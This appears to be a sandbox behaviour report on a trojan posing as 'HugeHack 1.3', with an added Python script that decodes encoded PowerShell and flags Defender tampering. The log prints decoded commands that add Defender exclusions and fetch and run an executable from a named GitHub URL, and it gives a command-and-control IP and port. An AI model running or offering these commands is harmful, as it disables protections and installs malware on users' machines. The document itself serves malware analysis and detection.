Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 7568 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 7180 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1920 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 1896 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3256 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3340 Thread sleep time: -922337203685477s >= -30000s
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wscript.exe, 00000004.00000003.1307246955.0000000003479000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxService%\\.\PhysicalDrive0
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: wscript.exe, 00000001.00000002.1270361152.0000000002C98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe, 00000005.00000003.1242547208.0000000014860000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxService
Source: javaw.exe, 00000005.00000002.3691735562.00000000006C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPL
Source: webhook.exe, 00000003.00000002.1327126250.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\dllhost.exe Network Connect: 46.121.250.34 7777
Source: Payload.exe.0.dr, kl.cs Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: Payload.exe.0.dr, kl.cs Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Payload.exe.0.dr, OK.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\wscript.exe Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\SysWOW64\wscript.exe Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\SysWOW64\wscript.exe Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Windows\SysWOW64\wscript.exe Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process created: C:\Users\user\AppData\Local\Temp\Payload.exe "C:\Users\user\AppData\Local\Temp\Payload.exe" Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process created: C:\Users\user\AppData\Local\Temp\webhook.exe "C:\Users\user\AppData\Local\Temp\webhook.exe" Jump to behavior
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\HugeHack.jar" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\WScript.exe" "C:\Users\user\AppData\Local\Temp\ere.js" /elevate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA== Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa== Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa= Jump to behavior
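The records above show the pattern a triage analyst has to unpick by hand: wscript.exe launches powershell.exe with `-enc` blobs that decode (base64 over UTF-16LE) to `Add-MpPreference -ExclusionPath`, a `reg add` into the Group Policy-managed `Windows Defender\Exclusions\Paths` key, and a download-and-run script, while Payload.exe starts a file named dllhost.exe from `%AppData%\Roaming` instead of System32. The script below is an added example, not part of the sandbox report or the malware: it decodes `-EncodedCommand` arguments (accepting the prefix forms `-e`, `-ec`, `-enc`, ... that powershell.exe accepts), flags the three tampering patterns, and flags system-binary names running outside System32/SysWOW64. The two encoded blobs are copied verbatim from the report's mixed-case records; the download script is a constructed stand-in with a placeholder host (not the report's URL), the process events are modelled on the report's process-creation lines, and the list of system-binary names is an assumed heuristic, not an exhaustive one.

```python
# Triage of sandbox process-creation records. Added example; not part of the report.
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# case-insensitively; the argument is base64 over the UTF-16LE encoding of the script.
_ENC_NAMES = {"ec"} | {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)}
ENC_FLAG = re.compile(
    r"(?:^|\s)[-/](?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(sorted(_ENC_NAMES, key=len, reverse=True)),
    re.I,
)

# Matched against the decoded script, or the raw command line when nothing is encoded.
INDICATORS = [
    ("defender_exclusion_cmdlet",
     re.compile(r"\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Extension|Process)", re.I)),
    ("defender_exclusion_registry",
     re.compile(r"Windows Defender\\Exclusions\\", re.I)),
    ("download_and_execute",
     re.compile(r"(?:Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer).*"
                r"(?:Start-Process|Invoke-Item|\biex\b|Invoke-Expression)", re.I | re.S)),
]

# Heuristic (assumption): these names are expected only under the two system directories.
SYSTEM_BINARY_NAMES = {"dllhost.exe", "svchost.exe", "runtimebroker.exe", "csrss.exe", "lsass.exe",
                       "services.exe", "winlogon.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decoded -EncodedCommand payload, or None if absent or not valid base64 / UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def masquerading_path(image_path: str) -> bool:
    """True when a system-binary name runs from outside System32/SysWOW64 (e.g. %AppData%)."""
    p = image_path.lower()
    return p.rsplit("\\", 1)[-1] in SYSTEM_BINARY_NAMES and not p.startswith(SYSTEM_DIRS)


@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str


def triage(ev: ProcessEvent) -> Dict[str, object]:
    decoded = decode_encoded_command(ev.cmdline)
    text = decoded if decoded is not None else ev.cmdline
    findings: List[str] = [label for label, pat in INDICATORS if pat.search(text)]
    if masquerading_path(ev.image):
        findings.append("system_binary_name_outside_system_dir")
    return {"parent": ev.parent, "image": ev.image, "decoded": decoded, "findings": findings}


PS32 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS_WOW = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\SysWOW64\wscript.exe"

# The two mixed-case blobs copied verbatim from the report's wscript.exe -> powershell.exe records.
REPORT_ENC_ADD_MPPREF = "cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA"
REPORT_ENC_REG_ADD = "cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA=="

# Constructed stand-in for the report's download-and-run script; the host is a placeholder.
CONSTRUCTED_DOWNLOAD_SCRIPT = (
    '$url = "https://example.invalid/RuntimeBroker.exe"\r\n'
    '$output = "$env:Temp/RuntimeBroker.exe"\r\n'
    "Invoke-WebRequest -Uri $url -OutFile $output\r\n"
    "Start-Process -FilePath $output"
)

# Events modelled on the report's process-creation lines (parent, image, command line).
SAMPLE_EVENTS = [
    ProcessEvent(WSCRIPT, PS_WOW, '"%s" -enc %s' % (PS32, REPORT_ENC_ADD_MPPREF)),
    ProcessEvent(WSCRIPT, PS_WOW, '"%s" -enc %s' % (PS32, REPORT_ENC_REG_ADD)),
    ProcessEvent(PS_WOW, r"C:\Windows\SysWOW64\reg.exe",
                 '"C:\\Windows\\system32\\reg.exe" add "HKLM\\SOFTWARE\\Policies\\Microsoft\\'
                 'Windows Defender\\Exclusions\\Paths" /v C:\\'),
    ProcessEvent(r"C:\Users\user\AppData\Local\Temp\Payload.exe",
                 r"C:\Users\user\AppData\Roaming\dllhost.exe", r'"C:\Users\user\AppData\Roaming\dllhost.exe"'),
    ProcessEvent(WSCRIPT, PS32, '"%s" -enc %s' % (PS32, encode_command(CONSTRUCTED_DOWNLOAD_SCRIPT))),
]


def triage_all() -> List[Dict[str, object]]:
    return [triage(ev) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for r in triage_all():
        print(r["image"], "->", ", ".join(r["findings"]) or "nothing flagged")
        if r["decoded"]:
            print("   decoded:", repr(r["decoded"]))
```

Two caveats when applying this to the records in this section. First, base64 is case-sensitive, so the later copies of the same commands that the report renders in lower case (`"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagca...`) cannot be decoded; use the mixed-case records. Second, the `reg add` target is the Group Policy-managed exclusion key, which the local `MpPreference` cmdlets do not manage, so an exclusion written there is not visible to or removable by `Remove-MpPreference` and has to be checked in the registry (or via `Get-MpPreference` on the merged view) during response.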
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_2_022C03C0 cpuid 5_2_022C03C0
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Users\user\AppData\Local\Temp\webhook.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
